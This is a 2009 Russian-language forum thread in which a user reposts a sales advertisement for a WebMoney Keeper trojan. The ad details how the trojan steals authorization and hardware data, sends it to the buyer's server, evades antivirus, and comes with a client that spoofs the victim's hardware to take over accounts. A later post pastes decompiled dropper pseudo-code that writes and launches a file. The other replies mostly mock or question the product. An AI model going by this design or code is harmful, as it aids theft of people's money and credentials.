Форум успешных вебмастеров - GoFuckBiz.com

  Форум успешных вебмастеров - GoFuckBiz.com > Разное > Треп | Флейм
Дата
USD/RUB59.1960
BTC/USD0.0000
Треп | Флейм Обсуждение самых разных тем вне онлайн бизнеса.

Закрытая тема
Опции темы Опции просмотра
Старый 01.08.2009, 21:00   #1
4guru
Senior Member
 
Аватар для 4guru
 
Регистрация: 18.08.2007
Сообщений: 459
Бабло: $100644855
Talking С ВМ клуба отголоски ...

WM Inside

WebMoney Grabbing System

Программа предназначена для получения доступа к счетам пользователей WebMoney Keeper Classic.

При авторизации пользователя в системе (входе в кипер) программа грабит все необходимые авторизационные данные и отсылает на сервер. Никаких подмен номеров кошельков в буфере обмена, распознавания капч, программного нажатия кнопок, социнженерии и прочих "детских" методов. Вы сами сольете титульные знаки, когда посчитаете нужным. Не требуется доступ к мылу пользователя для активации. Всю необходимую инфу об оборудовании и системе пользователя трой собирает и отправляет на сервер.

Написан на ассемблере. Размер билда: 9 кБ (Файл несжат).
Каждый билд криптуется уникальным ключем. (В будующем планируется полиморф).
Работа троя невидима для фаерволлов. (Тестировался с KIS 2009, последним OutPost и последним ZoneAlarm на дефолтных настройках).
В хороших отношения со всеми известными антивирусами. (VirusTotal: 0/39).

Работа происходит следующим образом.
После запуска ЕХЕ, трой устанавливается в систему (при наличии в ней WebMoney Keeper Classic) и самоудаляется. При следующем входе пользователя в систему WebMoney (при вводе WMID и пароля) с
грабленная инфа отправляется на сервер, после чего трой самоудаляется.
К трою прилагаются скрипты: сборщик логов и просмотр лога в онлайн. Скрипты на PHP, БД не требуется. Сграбленная инфа отображается в Online Log-Viewer'e по каждому ВМИДу, непосредственно оттуда она может импортироваться методом Copy+Paste в клиент (либо можно скачать и сохранить в файл).
Клиент представляет собой приложение, предназначенное для запуска из-под него Кипера с целью подмены в нем данных на нужные (сграбленные). Клиент запускает Кипер и производит необходимые изменения в памяти процесса Кипера, в результате чего Кипер передает на сервер ВМ не реальную информацию, а ту инфу, которую трой сграбил на машине пользователя (системная инфа и инфа об оборудовании). Этим достигается "прозрачный" вход на счет пользователя без необходимости активации оборудования по мылу или телефону. Клиент имеет приятный и интуитивно понятный графический интерфейс, работа с ним осуществляется "в два клика" - Log-Viewer: Ctrl+C; Client: "Import",Ctrl+V,"Run Keeper" - и Вы уже на нужном счете.
Клиент с Кипером можно запускать и на виртуальной машине - поскольку инфа об оборудовании подменяется, сервер WebMoney не узнает, что
Кипер запущен на виртуальной машине.
Важная особенность - клиент имеет возможность соксификации Кипера. Для этого используется прокси-движок известной программы FreeCap. Вам не нужно запускать Кипер из FreeCap'a, в клиенте включаете опцию "Use FreeCap" и при запуске Кипера его соединения будут пущены через сокс, задаваемый в FreeCap'e (а в нем можно задавать как Socks 4/5, HTTP Proxy с авторизацией или без, так и цепочки из соксов). Поскольку Кипер передает на сервер локально определяемый IP адрес, то рекомендуется также использовать VPN (а также для безопасности). Сграбленная инфа может импортироваться и экспортироваться в/из клиент(а) как в виде текста (непосредственно из Log-Viewer'a), так и в виде файла, который может быть скачан из того же Log-Viewer'a или сохранен из клиента.
Работает с Кипером версии 3.7.0.0 (текущий), 3.6.0.6 (предыдущий), возможно и с другими (тестировалась только с указанными).

Цена билда 100 WMZ.
Билд делается индивидуально на Ваш хост (куда будут отправляться логи).
Незначительные обновления бесплатно.
При необходимости производится чистка от АВ - 15 WMZ.

ICQ для связи : (если что, пишите в оффлайн).


damagelab.org/index.php?showtopic=17141
__________________
Freelancer.chat
4guru на форуме  
Старый 01.08.2009, 21:05   #2
creator123
Senior Member
 
Аватар для creator123
 
Регистрация: 05.01.2008
Сообщений: 1,576
Бабло: $184010
По умолчанию

я сначала подумал что это ты продаешь. Подумал, ну совсем уже охуели.
creator123 вне форума  
Старый 01.08.2009, 21:29   #3
mr.Djek
Senior Member
 
Аватар для mr.Djek
 
Регистрация: 17.06.2009
Сообщений: 2,183
Бабло: $243960
По умолчанию

Бля страшный трой, аж волосы дыбом втавали когда читал
Надо Касперычу писать, пусть противоядие делает
mr.Djek вне форума  
Старый 01.08.2009, 21:32   #4
mavook
Профи Интернет коммерции
 
Аватар для mavook
 
Регистрация: 04.04.2007
Сообщений: 2,345
Бабло: $456525
По умолчанию

а активация на телефон че не прет уже?
или оно его пробивает?
mavook вне форума  
Старый 01.08.2009, 21:34   #5
Drunk Monk
Je suis moine ivre
 
Аватар для Drunk Monk
 
Регистрация: 03.03.2009
Сообщений: 15,235
Бабло: $797160052
По умолчанию

чето дешево для такой жесткой шняги. и хули она в паблике?
__________________
EssayPartner.com. Партнерка по эссе трафу.
Drunk Monk вне форума  
Старый 01.08.2009, 21:35   #6
4guru
Senior Member
 
Аватар для 4guru
 
Регистрация: 18.08.2007
Сообщений: 459
Бабло: $100644855
ТС -->
автор темы ТС По умолчанию

Как вариант другой трой тащит бабло через радмина , когда кипер запущен уже .
__________________
Freelancer.chat
4guru на форуме  
Старый 01.08.2009, 21:36   #7
mr.Djek
Senior Member
 
Аватар для mr.Djek
 
Регистрация: 17.06.2009
Сообщений: 2,183
Бабло: $243960
По умолчанию

Я вот удивляюсь как вирусописатели такие мощные програмы умудряються в такие маленькие размеры укладывать, создателю фотошоперов у них еще учить и учиться
mr.Djek вне форума  
Старый 01.08.2009, 21:41   #8
4guru
Senior Member
 
Аватар для 4guru
 
Регистрация: 18.08.2007
Сообщений: 459
Бабло: $100644855
ТС -->
автор темы ТС По умолчанию

_entry_point__()
{

(save)ebp;
ebp = esp;
esp = esp - 16;
(save)ebx;
(save)esi;
eax = 0x4015ac;
L00401008();
ebx = 4636960;
(save)4096;
(save)0;
(save)L00401574();
(save)255;
L00401574();
edx = 261;
eax = 4636696;
L0040161c:
*eax = 0;
eax = eax + 1;
if(edx = edx - 1) {
goto L0040161c;
}
(save)261;
(save)4636696;
(save)0;
L004010b8();
(save)"C:\Program Files\";
(save)ebx;
L00401088();
(save)"W";
(save)ebx;
L00401090();
(save)"e";
(save)ebx;
L00401090();
(save)"b";
(save)ebx;
L00401090();
(save)"M";
(save)ebx;
L00401090();
(save)"one";
(save)ebx;
L00401090();
(save)"y";
(save)ebx;
L00401090();
(save)"\";
(save)ebx;
L00401090();
(save)"inet";
(save)ebx;
L00401090();
(save)"m";
(save)ebx;
L00401090();
(save)"i";
(save)ebx;
L00401090();
(save)"b";
(save)ebx;
L00401090();
(save)"1";
(save)ebx;
L00401090();
(save)".";
(save)ebx;
L00401090();
(save)"dll";
(save)ebx;
L00401090();
*ebx = *L0046C018;
(save)FreeConsole() & 127;
(save)422725;
FreeDDElParam();
(save)0;
(save)0;
(save)2;
(save)0;
(save)2;
(save)1073741824;
(save)ebx;
esi = L00401098();
if(esi != -1) {
L004014C4();
(save)0;
(save)4636692;
(save) *( *L0046BAC8);
(save) *L0046BAC4;
(save)esi;
(save)L004010a0() & 127;
(save)0;
(save)L00401574();
(save)255;
L00401574();
(save)esi;
(save)L004010a8();
(save)0;
(save)L00401574();
(save)255;
L00401574();
eax = 4636696;
L00401110();
} else {
eax = 4636696;
L00401110();
L00401518();
(save)"C:\c.exe";
(save)ebx;
L00401088();
*ebx = *L0046C018;
eax = 4636696;
L00401110();
(save)0;
(save)0;
(save)1;
(save)0;
(save)2;
(save)1073741824;
(save)ebx;
esi = L00401098();
if(esi != -1) {
(save)0;
(save)4636692;
(save) *( *L0046BAC0);
(save) *L0046BABC;
(save)esi;
(save)L004010a0() & 127;
(save)0;
(save)L00401574();
(save)255;
L00401574();
(save)esi;
(save)L004010a8();
(save)0;
(save)L00401574();
(save)255;
L00401574();
ShellExecuteA(0, "open", ebx, 0, 0, 5);
}
}
(save)0;
L00401000();


Пишут примерно вот так 8-)
__________________
Freelancer.chat
4guru на форуме  
Старый 01.08.2009, 21:42   #9
Drunk Monk
Je suis moine ivre
 
Аватар для Drunk Monk
 
Регистрация: 03.03.2009
Сообщений: 15,235
Бабло: $797160052
По умолчанию

Цитата:
Сообщение от mr.Djek Посмотреть сообщение
Я вот удивляюсь как вирусописатели такие мощные програмы умудряються в такие маленькие размеры укладывать, создателю фотошоперов у них еще учить и учиться
Это asm, врядли на нем написан фотошоп.

4guru, че за мова? O_o
На классический не похож..
__________________
EssayPartner.com. Партнерка по эссе трафу.
Drunk Monk вне форума  
Старый 01.08.2009, 21:45   #10
mr.Djek
Senior Member
 
Аватар для mr.Djek
 
Регистрация: 17.06.2009
Сообщений: 2,183
Бабло: $243960
По умолчанию

Эта шняга для клептоманов, есть такие люди предложи им честно заработать 100 баксов или украсть пару баксов, они без сомнения выберут второе, пускай паряться идиоты, меняют кучу заблокированых кошельков и ждут к себе домой отдел К. а мы уж честно заработаем , без всяких троев
mr.Djek вне форума  
Закрытая тема



Опции темы
Опции просмотра